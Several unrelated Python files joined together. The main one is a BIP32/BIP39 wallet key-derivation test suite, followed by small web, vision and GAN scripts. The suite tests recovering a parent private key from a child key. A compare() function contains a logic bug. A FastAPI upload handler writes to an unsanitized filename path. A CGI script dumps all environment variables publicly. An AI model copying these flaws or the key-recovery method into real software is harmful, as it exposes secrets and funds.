self.assertEqual(xprv, b"xprv9s21ZrQH143K25QhxbucbDDuQ4naNntJRi4KUfWT7xo4EKsHt2QJDu7KXp1A3u7Bi1j8ph3EGsZ9Xvz9dGuVrtHHs7pXeTzjuxBrCmmhgC6")
xpub = derive(xpub, ".") # public relative
self.assertEqual(xpub, b"xpub661MyMwAqRbcEZVB4dScxMAdx6d4nFc9nvyvH3v4gJL378CSRZiYmhRoP7mBy6gSPSCYk6SzXPTf3ND1cZAceL7SfJ1Z3GC8vBgp2epUt13")
xpub = derive(rootxpub, "m") # public absolute
self.assertEqual(xpub, b"xpub661MyMwAqRbcEZVB4dScxMAdx6d4nFc9nvyvH3v4gJL378CSRZiYmhRoP7mBy6gSPSCYk6SzXPTf3ND1cZAceL7SfJ1Z3GC8vBgp2epUt13")
xprv = derive(xprv, "./0'") # private relative
self.assertEqual(xprv, b"xprv9uPDJpEQgRQfDcW7BkF7eTya6RPxXeJCqCJGHuCJ4GiRVLzkTXBAJMu2qaMWPrS7AANYqdq6vcBcBUdJCVVFceUvJFjaPdGZ2y9WACViL4L")
xprv = derive(rootxprv, "m/0'") # private absolute
self.assertEqual(xprv, b"xprv9uPDJpEQgRQfDcW7BkF7eTya6RPxXeJCqCJGHuCJ4GiRVLzkTXBAJMu2qaMWPrS7AANYqdq6vcBcBUdJCVVFceUvJFjaPdGZ2y9WACViL4L")
xpub = xpub_from_xprv(xprv) # neutering
self.assertEqual(xpub, b"xpub68NZiKmJWnxxS6aaHmn81bvJeTESw724CRDs6HbuccFQN9Ku14VQrADWgqbhhTHBaohPX4CjNLf9fq9MYo6oDaPPLPxSb7gwQN3ih19Zm4Y")
def test_bip39_vectors(self):
"""BIP32 test vectors from BIP39
https://github.com/bitcoin/bips/blob/master/bip-0039.mediawiki
"""
file = "bip39_test_vectors.json"
filename = path.join(path.dirname(__file__), "data", file)
with open(filename, 'r') as f:
test_vectors = json.load(f)["english"]
f.closed
xkey_version = _PRV_VERSIONS[0]
for test_vector in test_vectors:
seed = test_vector[2]
rootxprv = rootxprv_from_seed(seed, xkey_version)
self.assertEqual(rootxprv, test_vector[3].encode('ascii'))
def test_mainnet(self):
# bitcoin core derivation style
rootxprv = b'xprv9s21ZrQH143K2ZP8tyNiUtgoezZosUkw9hhir2JFzDhcUWKz8qFYk3cxdgSFoCMzt8E2Ubi1nXw71TLhwgCfzqFHfM5Snv4zboSebePRmLS'
# m/0'/0'/463'
addr1 = b'1DyfBWxhVLmrJ7keyiHeMbt7N3UdeGU4G5'
indexes = [0x80000000, 0x80000000, 0x800001cf]
addr = p2pkh_from_xpub(xpub_from_xprv(derive(rootxprv, indexes)))
self.assertEqual(addr, addr1)
path = "m/0'/0'/463'"
addr = p2pkh_from_xpub(xpub_from_xprv(derive(rootxprv, path)))
self.assertEqual(addr, addr1)
# m/0'/0'/267'
addr2 = b'11x2mn59Qy43DjisZWQGRResjyQmgthki'
indexes = [0x80000000, 0x80000000, 0x8000010b]
addr = p2pkh_from_xpub(xpub_from_xprv(derive(rootxprv, indexes)))
self.assertEqual(addr, addr2)
path = "m/0'/0'/267'"
addr = p2pkh_from_xpub(xpub_from_xprv(derive(rootxprv, path)))
self.assertEqual(addr, addr2)
xkey_version = _PRV_VERSIONS[0]
seed = "bfc4cbaad0ff131aa97fa30a48d09ae7df914bcc083af1e07793cd0a7c61a03f65d622848209ad3366a419f4718a80ec9037df107d8d12c19b83202de00a40ad"
seed = bytes.fromhex(seed)
xprv = rootxprv_from_seed(seed, xkey_version)
xpub = b'xpub661MyMwAqRbcFMYjmw8C6dJV97a4oLss6hb3v9wTQn2X48msQB61RCaLGtNhzgPCWPaJu7SvuB9EBSFCL43kTaFJC3owdaMka85uS154cEh'
self.assertEqual(xpub_from_xprv(xprv), xpub)
ind = './0/0'
addr = p2pkh_from_xpub(xpub_from_xprv(derive(xprv, ind)))
self.assertEqual(addr, b'1FcfDbWwGs1PmyhMVpCAhoTfMnmSuptH6g')
ind = './0/1'
addr = p2pkh_from_xpub(xpub_from_xprv(derive(xprv, ind)))
self.assertEqual(addr, b'1K5GjYkZnPFvMDTGaQHTrVnd8wjmrtfR5x')
ind = './0/2'
addr = p2pkh_from_xpub(xpub_from_xprv(derive(xprv, ind)))
self.assertEqual(addr, b'1PQYX2uN7NYFd7Hq22ECMzfDcKhtrHmkfi')
ind = './1/0'
addr = p2pkh_from_xpub(xpub_from_xprv(derive(xprv, ind)))
self.assertEqual(addr, b'1BvSYpojWoWUeaMLnzbkK55v42DbizCoyq')
ind = './1/1'
addr = p2pkh_from_xpub(xpub_from_xprv(derive(xprv, ind)))
self.assertEqual(addr, b'1NXB59hF4QzYpFrB7o6usLBjbk2D3ZqxAL')
ind = './1/2'
addr = p2pkh_from_xpub(xpub_from_xprv(derive(xprv, ind)))
self.assertEqual(addr, b'16NLYkKtvYhW1Jp86tbocku3gxWcvitY1w')
# version/key mismatch in extended parent key
temp = b58decode(rootxprv)
bad_xprv = b58encode(temp[0:45] + b'\x01' + temp[46:])
self.assertRaises(ValueError, derive, bad_xprv, 1)
#derive(bad_xprv, 1)
# version/key mismatch in extended parent key
xpub = xpub_from_xprv(rootxprv)
temp = b58decode(xpub)
bad_xpub = b58encode(temp[0:45] + b'\x00' + temp[46:])
self.assertRaises(ValueError, derive, bad_xpub, 1)
#derive(bad_xpub, 1)
# no private/hardened derivation from pubkey
self.assertRaises(ValueError, derive, xpub, 0x80000000)
#derive(xpub, 0x80000000)
def test_testnet(self):
# bitcoin core derivation style
rootxprv = b'tprv8ZgxMBicQKsPe3g3HwF9xxTLiyc5tNyEtjhBBAk29YA3MTQUqULrmg7aj9qTKNfieuu2HryQ6tGVHse9x7ANFGs3f4HgypMc5nSSoxwf7TK'
# m/0'/0'/51'
addr1 = b'mfXYCCsvWPgeCv8ZYGqcubpNLYy5nYHbbj'
indexes = [0x80000000, 0x80000000, 0x80000000 + 51]
addr = p2pkh_from_xpub(
xpub_from_xprv(derive(rootxprv, indexes)))
self.assertEqual(addr, addr1)
path = "m/0'/0'/51'"
addr = p2pkh_from_xpub(
xpub_from_xprv(derive(rootxprv, path)))
self.assertEqual(addr, addr1)
# m/0'/1'/150'
addr2 = b'mfaUnRFxVvf55uD1P3zWXpprN1EJcKcGrb'
indexes = [0x80000000, 0x80000000 + 1, 0x80000000 + 150]
addr = p2pkh_from_xpub(
xpub_from_xprv(derive(rootxprv, indexes)))
self.assertEqual(addr, addr2)
path = "m/0'/1'/150'"
addr = p2pkh_from_xpub(
xpub_from_xprv(derive(rootxprv, path)))
self.assertEqual(addr, addr2)
def test_exceptions(self):
# valid xprv
xprv = b'xprv9s21ZrQH143K2oxHiQ5f7D7WYgXD9h6HAXDBuMoozDGGiYHWsq7TLBj2yvGuHTLSPCaFmUyN1v3fJRiY2A4YuNSrqQMPVLZKt76goL6LP7L'
# invalid index
self.assertRaises(ValueError, derive, xprv, 'invalid index')
#derive(xprv, 'invalid index')
# a 4 bytes int is required, not 3
self.assertRaises(ValueError, derive, xprv, "800000")
#derive(xprv, "800000")
# Invalid derivation path root: ""
self.assertRaises(ValueError, derive, xprv, '/1')
#derive(xprv, '/1')
# invalid checksum
xprv = b'xppp9s21ZrQH143K2oxHiQ5f7D7WYgXD9h6HAXDBuMoozDGGiYHWsq7TLBj2yvGuHTLSPCaFmUyN1v3fJRiY2A4YuNSrqQMPVLZKt76goL6LP7L'
self.assertRaises(ValueError, derive, xprv, 0x80000000)
#derive(xprv, 0x80000000)
# invalid extended key version
version = b'\x04\x88\xAD\xE5'
xkey = version + b'\x00'*74
xkey = b58encode(xkey)
self.assertRaises(ValueError, derive, xkey, 0x80000000)
#derive(xkey, 0x80000000)
# unknown extended key version
version = b'\x04\x88\xAD\xE5'
seed = "5b56c417303faa3fcba7e57400e120a0ca83ec5a4fc9ffba757fbe63fbd77a89a1a3be4c67196f57c39a88b76373733891bfaba16ed27a813ceed498804c0570"
self.assertRaises(ValueError, rootxprv_from_seed, seed, version)
#rootxprv_from_seed(seed, version)
# extended key is not a private one
xpub = b'xpub6H1LXWLaKsWFhvm6RVpEL9P4KfRZSW7abD2ttkWP3SSQvnyA8FSVqNTEcYFgJS2UaFcxupHiYkro49S8yGasTvXEYBVPamhGW6cFJodrTHy'
self.assertRaises(ValueError, xpub_from_xprv, xpub)
# xpub_from_xprv(xpub)
# Absolute derivation path for non-master key
self.assertRaises(ValueError, derive, xpub, "m/44'/0'/1'/0/10")
#derive(xpub, "m/0/1")
# empty derivation path
self.assertRaises(ValueError, derive, xpub, "")
#derive(xpub, "")
# extended key is not a public one
self.assertRaises(ValueError, p2pkh_from_xpub, xprv)
# p2pkh_from_xpub(xprv)
# xkey is not a public one
xprv = b'xprv9s21ZrQH143K2ZP8tyNiUtgoezZosUkw9hhir2JFzDhcUWKz8qFYk3cxdgSFoCMzt8E2Ubi1nXw71TLhwgCfzqFHfM5Snv4zboSebePRmLS'
self.assertRaises(ValueError, slip32.address_from_xpub, xprv)
# slip32.address_from_xpub(xprv)
self.assertRaises(ValueError, p2wpkh_from_xpub, xprv)
# p2wpkh_from_xpub(xprv)
self.assertRaises(
ValueError, p2wpkh_p2sh_from_xpub, xprv)
# p2wpkh_p2sh_from_xpub(xprv)
def test_exceptions2(self):
rootxprv = b'xprv9s21ZrQH143K2ZP8tyNiUtgoezZosUkw9hhir2JFzDhcUWKz8qFYk3cxdgSFoCMzt8E2Ubi1nXw71TLhwgCfzqFHfM5Snv4zboSebePRmLS'
d = deserialize(rootxprv)
self.assertEqual(serialize(d), rootxprv)
# invalid 34-bytes key length
d['key'] += b'\x00'
self.assertRaises(ValueError, serialize, d)
#serialize(d)
# invalid 33-bytes chain_code length
d = deserialize(rootxprv)
d['chain_code'] += b'\x00'
self.assertRaises(ValueError, serialize, d)
#serialize(d)
# invalid 5-bytes parent_fingerprint length
d = deserialize(rootxprv)
d['parent_fingerprint'] += b'\x00'
self.assertRaises(ValueError, serialize, d)
#serialize(d)
# invalid 5-bytes index length
d = deserialize(rootxprv)
d['index'] += b'\x00'
self.assertRaises(ValueError, serialize, d)
#serialize(d)
# invalid depth (256)
d = deserialize(rootxprv)
d['depth'] = 256
self.assertRaises(ValueError, serialize, d)
#serialize(d)
# zero depth with non-zero index b'\x00\x00\x00\x01'
d = deserialize(rootxprv)
d['index'] = b'\x00\x00\x00\x01'
self.assertRaises(ValueError, serialize, d)
#serialize(d)
# zero depth with non-zero parent_fingerprint b'\x00\x00\x00\x01'
d = deserialize(rootxprv)
d['parent_fingerprint'] = b'\x00\x00\x00\x01'
self.assertRaises(ValueError, serialize, d)
#serialize(d)
# non-zero depth (1) with zero parent_fingerprint b'\x00\x00\x00\x00'
xprv = deserialize(derive(rootxprv, 1))
xprv['parent_fingerprint'] = b'\x00\x00\x00\x00'
self.assertRaises(ValueError, serialize, xprv)
#serialize(xprv)
# int too big to convert
self.assertRaises(OverflowError, derive, rootxprv, 256**4)
# Index must be 4-bytes, not 5
self.assertRaises(ValueError, derive, rootxprv, b'\x00'*5)
#derive(rootxprv, b'\x00'*5)
def test_testnet_versions(self):
# data cross-checked with Electrum and https://jlopp.github.io/xpub-converter/
# 128 bits
raw_entr = bytes.fromhex('6'*32)
# 12 words
mnemonic = bip39.mnemonic_from_entropy(raw_entr, 'en')
seed = bip39.seed_from_mnemonic(mnemonic, '')
# p2pkh BIP44
# m / 44' / coin_type' / account' / change / address_index
path = "m/44h/1h/0h"
version = TEST_tprv
rootprv = rootxprv_from_seed(seed, version)
xprv = derive(rootprv, path)
xpub = xpub_from_xprv(xprv)
exp = b'tpubDChqWo2Xi2wNsxyJBE8ipcTJHLKWcqeeNUKBVTpUCNPZkHzHTm3qKAeHqgCou1t8PAY5ZnJ9QDa6zXSZxmjDnhiBpgZ7f6Yv88wEm5HXVbm'
self.assertEqual(xpub, exp)
# first addresses
xpub_ext = derive(xpub, "./0/0") # external
address = p2pkh_from_xpub(xpub_ext)
exp_address = b'moutHSzeFWViMNEcvBxKzNCMj2kca8MvE1'
self.assertEqual(address, exp_address)
xpub_int = derive(xpub, "./1/0") # internal
address = p2pkh_from_xpub(xpub_int)
exp_address = b'myWcXdNais9ExumnGKnNoJwoihQKfNPG9i'
self.assertEqual(address, exp_address)
# legacy segwit (p2wpkh-p2sh)
# m / 49'/ coin_type' / account' / change / address_index
path = "m/49h/1h/0h"
version = TEST_uprv
rootprv = rootxprv_from_seed(seed, version)
xprv = derive(rootprv, path)
xpub = xpub_from_xprv(xprv)
exp = b'upub5Dj8j7YrwodV68mt58QmNpSzjqjso2WMXEpLGLSvskKccGuXhCh3dTedkzVLAePA617UyXAg2vdswJXTYjU4qjMJaHU79GJVVJCAiy9ezZ2'
self.assertEqual(xpub, exp)
# first addresses
xpub_ext = derive(xpub, "./0/0") # external
address = p2wpkh_p2sh_from_xpub(xpub_ext)
exp_address = b'2Mw8tQ6uT6mHhybarVhjgomUhHQJTeV9A2c'
self.assertEqual(address, exp_address)
xpub_int = derive(xpub, "./1/0") # internal
address = p2wpkh_p2sh_from_xpub(xpub_int)
exp_address = b'2N872CRJ3E1CzWjfixXr3aeC3hkF5Cz4kWb'
self.assertEqual(address, exp_address)
# legacy segwit (p2wsh-p2sh)
# m / 49'/ coin_type' / account' / change / address_index
path = "m/49h/1h/0h"
version = TEST_Uprv
rootprv = rootxprv_from_seed(seed, version)
xprv = derive(rootprv, path)
xpub = xpub_from_xprv(xprv)
exp = b'Upub5QdDrMHJWmBrWhwG1nskCtnoTdn91PBwqWU1BbiUFXA2ETUSTc5KiaWZZhSoj5c4KUBTr7Anv92P4U9Dqxd1zDTyQkaWYfmVP2U3Js1W5cG'
self.assertEqual(xpub, exp)
# native segwit (p2wpkh)
# m / 84'/ coin_type' / account' / change / address_index
path = "m/84h/1h/0h"
version = TEST_vprv
rootprv = rootxprv_from_seed(seed, version)
xprv = derive(rootprv, path)
xpub = xpub_from_xprv(xprv)
exp = b'vpub5ZhJmduYY7M5J2qCJgSW7hunX6zJrr5WuNg2kKt321HseZEYxqJc6Zso47aNXQw3Wf3sA8kppbfsxnLheUNXcL3xhzeBHLNp8fTVBN6DnJF'
self.assertEqual(xpub, exp)
# first addresses
xpub_ext = derive(xpub, "./0/0") # external
address = p2wpkh_from_xpub(xpub_ext)
# this is regtest, not testnet!!
exp_address = b'bcrt1qv8lcnmj09rpdqwgl025h2deygur64z4hqf7me5'
# FIXME: self.assertEqual(address, exp_address)
xpub_int = derive(xpub, "./1/0") # internal
address = p2wpkh_from_xpub(xpub_int)
# this is regtest, not testnet!!
exp_address = b'bcrt1qqhxvky4y6qkwpvdzqjkdafmj20vs5trmt6y8w5'
# FIXME: self.assertEqual(address, exp_address)
# native segwit (p2wsh)
# m / 84'/ coin_type' / account' / change / address_index
path = "m/84h/1h/0h"
version = TEST_Vprv
rootprv = rootxprv_from_seed(seed, version)
xprv = derive(rootprv, path)
xpub = xpub_from_xprv(xprv)
exp = b'Vpub5kbPtsdz74uSibzaFLuUwnFbEu2a5Cm7DeKhfb9aPn8HGjoTjEgtBgjirpXr5r9wk87r2ikwhp4P5wxTwhXUkpAdYTkagjqp2PjMmGPBESU'
self.assertEqual(xpub, exp)
def test_mainnet_versions(self):
# data cross-checked with Electrum and https://jlopp.github.io/xpub-converter/
# 128 bits
raw_entr = bytes.fromhex('6'*32)
# 12 words
mnemonic = bip39.mnemonic_from_entropy(raw_entr, 'en')
seed = bip39.seed_from_mnemonic(mnemonic, '')
# p2pkh BIP44
# m / 44' / coin_type' / account' / change / address_index
path = "m/44h/0h/0h"
version = MAIN_xprv
rootprv = rootxprv_from_seed(seed, version)
xprv = derive(rootprv, path)
xpub = xpub_from_xprv(xprv)
exp = b'xpub6C3uWu5Go5q62JzJpbjyCLYRGLYvexFeiepZTsYZ6SRexARkNfjG7GKtQVuGR3KHsyKsAwv7Hz3iNucPp6pfHiLvBczyK1j5CtBtpHB3NKx'
self.assertEqual(xpub, exp)
# first addresses
xpub_ext = derive(xpub, "./0/0") # external
address = p2pkh_from_xpub(xpub_ext)
exp_address = b'1DDKKVHoFWGfctyEEJvrusqq6ipEaieGCq'
self.assertEqual(address, exp_address)
xpub_int = derive(xpub, "./1/0") # internal
address = p2pkh_from_xpub(xpub_int)
exp_address = b'1FhKoffreKHzhtBMVW9NSsg3ZF148JPGoR'
self.assertEqual(address, exp_address)
# legacy segwit (p2wpkh-p2sh)
# m / 49'/ coin_type' / account' / change / address_index
path = "m/49h/0h/0h"
version = MAIN_yprv
rootprv = rootxprv_from_seed(seed, version)
xprv = derive(rootprv, path)
xpub = xpub_from_xprv(xprv)
exp = b'ypub6YBGdYufCVeoPVmNXfdrWhaBCXsQoLKNetNmD9bPTrKmnKVmiyU8f1uJqwGdmBb8kbAZpHoYfXQTLbWpkXc4skQDAreeCUXdbX9k8vtiHsN'
self.assertEqual(xpub, exp)
# first addresses
xpub_ext = derive(xpub, "./0/0") # external
address = p2wpkh_p2sh_from_xpub(xpub_ext)
exp_address = b'3FmNAiTCWe5kPMgc4dtSgEdY8VuaCiJEH8'
self.assertEqual(address, exp_address)
xpub_int = derive(xpub, "./1/0") # internal
address = p2wpkh_p2sh_from_xpub(xpub_int)
exp_address = b'34FLgkoRYX5Q5fqiZCZDwsK5GpXxmFuLJN'
self.assertEqual(address, exp_address)
# legacy segwit (p2wsh-p2sh)
# m / 49'/ coin_type' / account' / change / address_index
path = "m/49h/0h/0h"
version = MAIN_Yprv
rootprv = rootxprv_from_seed(seed, version)
xprv = derive(rootprv, path)
xpub = xpub_from_xprv(xprv)
exp = b'Ypub6j5Mkne6mTDAp4vkUL6qLmuyvKug1gzxyA2S8QrvqdABQW4gVNrQk8mEeeE7Kcp2z4EYgsofYjnxTm8b3km22EWt1Km3bszdVFRcipc6rXu'
self.assertEqual(xpub, exp)
# native segwit (p2wpkh)
# m / 84'/ coin_type' / account' / change / address_index
path = "m/84h/0h/0h"
version = MAIN_zprv
rootprv = rootxprv_from_seed(seed, version)
xprv = derive(rootprv, path)
xpub = xpub_from_xprv(xprv)
exp = b'zpub6qg3Uc1BAQkQvcBUYMmZHSzbsshSon3FvJ8yvH3ZZMjFNvJkwSji8UUwghiF3wvpvSvcNWVP8kfUhc2V2RwGp6pTC3ouj6njj956f26TniN'
self.assertEqual(xpub, exp)
# first addresses
xpub_ext = derive(xpub, "./0/0") # external
address = p2wpkh_from_xpub(xpub_ext)
exp_address = b'bc1q0hy024867ednvuhy9en4dggflt5w9unw4ztl5a'
self.assertEqual(address, exp_address)
xpub_int = derive(xpub, "./1/0") # internal
address = p2wpkh_from_xpub(xpub_int)
exp_address = b'bc1qy4x03jyl88h2zeg7l287xhv2xrwk4c3ztfpjd2'
self.assertEqual(address, exp_address)
# native segwit (p2wsh)
# m / 84'/ coin_type' / account' / change / address_index
path = "m/84h/0h/0h"
version = MAIN_Zprv
rootprv = rootxprv_from_seed(seed, version)
xprv = derive(rootprv, path)
xpub = xpub_from_xprv(xprv)
exp = b'Zpub72a8bqjcjNJnMBLrV2EY7XLQbfji28irEZneqYK6w8Zf16sfhr7zDbLsVQficP9j9uzbF6VW1y3ypmeFKf6Dxaw82WvK8WFjcsLyEvMNZjF'
self.assertEqual(xpub, exp)
def test_rootxprv_from_mnemonic(self):
mnemonic = "abandon abandon atom trust ankle walnut oil across awake bunker divorce abstract"
passphrase = ''
rootxprv = rootxprv_from_bip39mnemonic(mnemonic, passphrase, _PRV_VERSIONS[0])
exp = b'xprv9s21ZrQH143K3ZxBCax3Wu25iWt3yQJjdekBuGrVa5LDAvbLeCT99U59szPSFdnMe5szsWHbFyo8g5nAFowWJnwe8r6DiecBXTVGHG124G1'
self.assertEqual(rootxprv, exp)
def test_crack(self):
parent_xpub = b'xpub6BabMgRo8rKHfpAb8waRM5vj2AneD4kDMsJhm7jpBDHSJvrFAjHJHU5hM43YgsuJVUVHWacAcTsgnyRptfMdMP8b28LYfqGocGdKCFjhQMV'
child_xprv = b'xprv9xkG88dGyiurKbVbPH1kjdYrA8poBBBXa53RKuRGJXyruuoJUDd8e4m6poiz7rV8Z4NoM5AJNcPHN6aj8wRFt5CWvF8VPfQCrDUcLU5tcTm'
parent_xprv = crack_prvkey(parent_xpub, child_xprv)
self.assertEqual(xpub_from_xprv(parent_xprv), parent_xpub)
# same check with XKeyDict
parent_xprv = crack_prvkey(deserialize(parent_xpub), deserialize(child_xprv))
self.assertEqual(xpub_from_xprv(parent_xprv), parent_xpub)
# extended parent key is not a public one
self.assertRaises(ValueError, crack_prvkey, parent_xprv, child_xprv)
#crack_prvkey(parent_xprv, child_xprv)
# extended child key is not a private one
self.assertRaises(ValueError, crack_prvkey, parent_xpub, parent_xpub)
#crack_prvkey(parent_xpub, parent_xpub)
# wrong child/parent depth relation
child_xpub = xpub_from_xprv(child_xprv)
self.assertRaises(ValueError, crack_prvkey, child_xpub, child_xprv)
#crack_prvkey(child_xpub, child_xprv)
# not a child for the provided parent
child0_xprv = derive(parent_xprv, 0)
grandchild_xprv = derive(child0_xprv, 0)
self.assertRaises(ValueError, crack_prvkey, child_xpub, grandchild_xprv)
#crack_prvkey(child_xpub, grandchild_xprv)
# hardened derivation
hardened_child_xprv = derive(parent_xprv, 0x80000000)
self.assertRaises(ValueError, crack_prvkey,
parent_xpub, hardened_child_xprv)
#crack_prvkey(parent_xpub, hardened_child_xprv)
if __name__ == "__main__":
# execute only if run as a script
unittest.main()
|
""" CCX API v0 Paginators. """
from edx_rest_framework_extensions.paginators import DefaultPagination
class CCXAPIPagination(DefaultPagination):
"""
Pagination format used by the CCX API.
"""
page_size_query_param = "page_size"
def get_paginated_response(self, data):
"""
Annotate the response with pagination information.
"""
response = super().get_paginated_response(data)
# Add the current page to the response.
response.data["current_page"] = self.page.number
# This field can be derived from other fields in the response,
# so it may make sense to have the JavaScript client calculate it
# instead of including it in the response.
response.data["start"] = (self.page.number - 1) * self.get_page_size(self.request)
return response
|
def compare(v1, operator, v2):
if operator == ">":
return v1 > v2
elif operator == "<":
return v1 < v2
elif operator == ">=":
return v1 >= v2
elif operator == "<=":
return v1 <= v2
elif operator == "=" or "==":
return v1 == v2
elif operator == "!=":
return v1 != v2
|
from django.http import HttpResponse
from django.shortcuts import render
from django.views import View
from .models import Grid
from apps.subjects.models import Subject
# Create your views here.
'''
class GridView(View):
template_name = 'grids/grids.html'
def get(self, request):
grids = Grid.objects.filter(code, name, situation)
context = {
'grids': grids,
}
return render(request, self.template_name, context)
''' |
from fastapi import FastAPI, HTTPException
import io
import numpy as np
from enum import Enum
from fastapi import FastAPI, UploadFile, File, HTTPException
from fastapi.responses import StreamingResponse
import cv2
import cvlib as cv
from cvlib.object_detection import draw_bbox
# Asignamos una instancia de la clase FastAPI a la variable "app".
# Interacturaremos con la API usando este elemento.
app = FastAPI(title='Implementando un modelo de Machine Learning usando FastAPI')
# Enlistamos los modelos disponibles usando Enum. Útil cuando tenemos opciones predefinidas.
class Model(str, Enum):
yolov3tiny = "yolov3-tiny"
yolov3 = "yolov3"
# Usando @app.get("/") definimos un método GET para el endpoint / (que sería como el "home").
@app.get("/")
def home():
return "¡¡¡¡¡Felicitaciones!!!!! La app web está funcionando. Anda ahora a https://producto-datos-lab2.herokuapp.com/docs."
# Este endpoint maneja la lógica necesaria para detectar objetos.
# Requiere como entrada el modelo deseado y la imagen.
@app.post("/predict")
def prediction(model: Model, file: UploadFile = File(...)):
# 1. Validar el archivo de entrada
filename = file.filename
fileExtension = filename.split(".")[-1] in ("jpg", "jpeg", "png")
if not fileExtension:
raise HTTPException(status_code=415, detail="Tipo de archivo no soportado.")
# 2. Transformar la imagen cruda a una imagen CV2
# Leer la imagen como un stream de bytes
image_stream = io.BytesIO(file.file.read())
# Empezar el stream desde el principio (posicion cero)
image_stream.seek(0)
# Escribir el stream en un numpy array
file_bytes = np.asarray(bytearray(image_stream.read()), dtype=np.uint8)
# Decodificar el numpy array como una imagen
image = cv2.imdecode(file_bytes, cv2.IMREAD_COLOR)
# 3. Correr el modelo de detección de objetos
# Correr la detección de objetos
bbox, label, conf = cv.detect_common_objects(image, model=model)
# Crear una imagen que contenga las cajas delimitadoras y etiquetas
output_image = draw_bbox(image, bbox, label, conf)
# Guardarla en un directorio del server
cv2.imwrite(f'/tmp/{filename}', output_image)
# 4. Transmitir la respuesta de vuelta al cliente
# Abrir la imagen para leerla en formato binario
file_image = open(f'/tmp/{filename}', mode="rb")
# Retornar la imagen como un stream usando un formato específico
return StreamingResponse(file_image, media_type="image/jpeg")
|
# -*- coding: utf-8 -*-
"""
MIT License
Copyright (c) 2020 Matteo Ingrosso
Basic loop to get baseline value for performance comparison between simulated
images and objective ones.
It just takes the two optical images as source and gets the indices for them.
"""
from config import *
from metrics import PSNR, SSIM
from PIL import Image
import os
import torch
import torchvision.transforms as transforms
Image.MAX_IMAGE_PIXELS = 1000000000
psnr = PSNR()
ssim = SSIM()
for region in regions:
o0 = Image.open(os.path.join(source_folder, region, 'o0.jpg'))
o0 = transforms.ToTensor().__call__(o0)
o0 = o0.unsqueeze(0)
o1 = Image.open(os.path.join(source_folder, region, 'o1.jpg'))
o1 = transforms.ToTensor().__call__(o1)
o1 = o1.unsqueeze(0)
psnr_value = psnr(o1, o0).item()
ssim_value = ssim(o1, o0).item()
print('>>>INDICES FOR %s<<<' % (region[2:]))
print('PSNR: %.4f SSIM: %.4f' % (psnr_value, ssim_value))
|
import torch
class Lambda(torch.nn.Module):
def __init__(self, f):
super().__init__()
self.f = f
def forward(self, X):
return self.f(X)
class ResBlock(torch.nn.Module):
def __init__(self, shortcut, act, layers):
super().__init__()
self.sht = shortcut
self.act = act
self.net = torch.nn.Sequential(*layers)
def forward(self, X):
return self.act(self.sht(X) + self.net(X))
class Generator(torch.nn.Module):
def __init__(self, noise_size, hidden_size, max_traj_len):
super().__init__()
assert max_traj_len % 4 == 0
self.net = torch.nn.Sequential(
torch.nn.Linear(noise_size, hidden_size * max_traj_len//4),
Lambda(lambda X: X.view(-1, hidden_size, max_traj_len//4)),
torch.nn.ReLU(),
torch.nn.ConvTranspose1d(hidden_size, hidden_size, 8, stride=2, padding=3),
ResBlock(
shortcut=torch.nn.Conv1d(hidden_size, hidden_size, 1),
act=torch.nn.ReLU(),
layers=[
torch.nn.BatchNorm1d(hidden_size),
torch.nn.ReLU(),
torch.nn.Conv1d(hidden_size, hidden_size, 7, padding=3),
torch.nn.BatchNorm1d(hidden_size),
torch.nn.ReLU(),
torch.nn.Conv1d(hidden_size, hidden_size, 7, padding=3)
]
),
torch.nn.ReLU(),
torch.nn.ConvTranspose1d(hidden_size, hidden_size, 8, stride=2, padding=3),
ResBlock(
shortcut=torch.nn.Conv1d(hidden_size, hidden_size, 1),
act=torch.nn.ReLU(),
layers=[
torch.nn.BatchNorm1d(hidden_size),
torch.nn.ReLU(),
torch.nn.Conv1d(hidden_size, hidden_size, 11, padding=5),
torch.nn.BatchNorm1d(hidden_size),
torch.nn.ReLU(),
torch.nn.Conv1d(hidden_size, hidden_size, 11, padding=5)
]
),
torch.nn.BatchNorm1d(hidden_size),
torch.nn.ReLU(),
torch.nn.Conv1d(hidden_size, 3, 7, padding=3),
torch.nn.Tanh()
)
def forward(self, z):
return self.net(z)
class Discriminator(torch.nn.Module):
def __init__(self, array_length, hidden_size):
super().__init__()
assert array_length % 8 == 0
self.net = torch.nn.Sequential(
Lambda(lambda X: X.squeeze(1)),
torch.nn.utils.spectral_norm(
torch.nn.Conv1d(3, hidden_size, 7, stride=2, padding=3)
),
ResBlock(
shortcut=torch.nn.utils.spectral_norm(
torch.nn.Conv1d(hidden_size, hidden_size, 1)
),
act=torch.nn.LeakyReLU(),
layers=[
torch.nn.LeakyReLU(),
torch.nn.utils.spectral_norm(
torch.nn.Conv1d(hidden_size, hidden_size, 11, padding=5)
),
torch.nn.LeakyReLU(),
torch.nn.utils.spectral_norm(
torch.nn.Conv1d(hidden_size, hidden_size, 11, padding=5)
),
]
),
torch.nn.LeakyReLU(),
torch.nn.utils.spectral_norm(
torch.nn.Conv1d(hidden_size, hidden_size, 7, stride=2, padding=3)
),
ResBlock(
shortcut=torch.nn.utils.spectral_norm(
torch.nn.Conv1d(hidden_size, hidden_size, 1)
),
act=torch.nn.LeakyReLU(),
layers=[
torch.nn.LeakyReLU(),
torch.nn.utils.spectral_norm(
torch.nn.Conv1d(hidden_size, hidden_size, 7, padding=3)
),
torch.nn.LeakyReLU(),
torch.nn.utils.spectral_norm(
torch.nn.Conv1d(hidden_size, hidden_size, 7, padding=3)
)
]
),
torch.nn.LeakyReLU(),
torch.nn.utils.spectral_norm(
torch.nn.Conv1d(hidden_size, hidden_size, 7, stride=2, padding=3)
),
Lambda(lambda X: X.view(-1, hidden_size * array_length//8)),
torch.nn.LeakyReLU(),
torch.nn.utils.spectral_norm(
torch.nn.Linear(hidden_size * array_length//8, 1)
)
)
def forward(self, X):
return self.net(X)
@staticmethod
def loss(D, X, Xh):
return D(X).mean(axis=0) - D(Xh).mean(axis=0) |
#!/usr/bin/env python3
import os
import json
from textwrap import indent
import sys
#PRINT OUT ALL ENV VARIABLES AS PLAIN TEXT
# print("Content-Type: text/plain") #let browser know to expect plain text
# print()
# print(os.environ)
#PRINT ENV VARIABLES AS JSON
print("Content-Type: application/json")
print()
print(json.dumps(dict(os.environ), indent=2))
#PRINT QUERY PARAMETER DATA IN HTML
# print("Content-Type: text/html")
# print()
# print(f"<p>QUERY_STRING={os.environ['QUERY_STRING']}</p>")
# posted_bytes = os.environ.get("CONTENT_LENGTH", 0)
# print(f"<p>QUERY_STRING={posted_bytes}</p>")
# if posted_bytes:
# posted = sys.stdin.read(int(posted_bytes))
# print(f"<p> POSTED: <pre>")
# for line in posted.splitlines():
# print(line)
# print("</pre></p>") |
"""
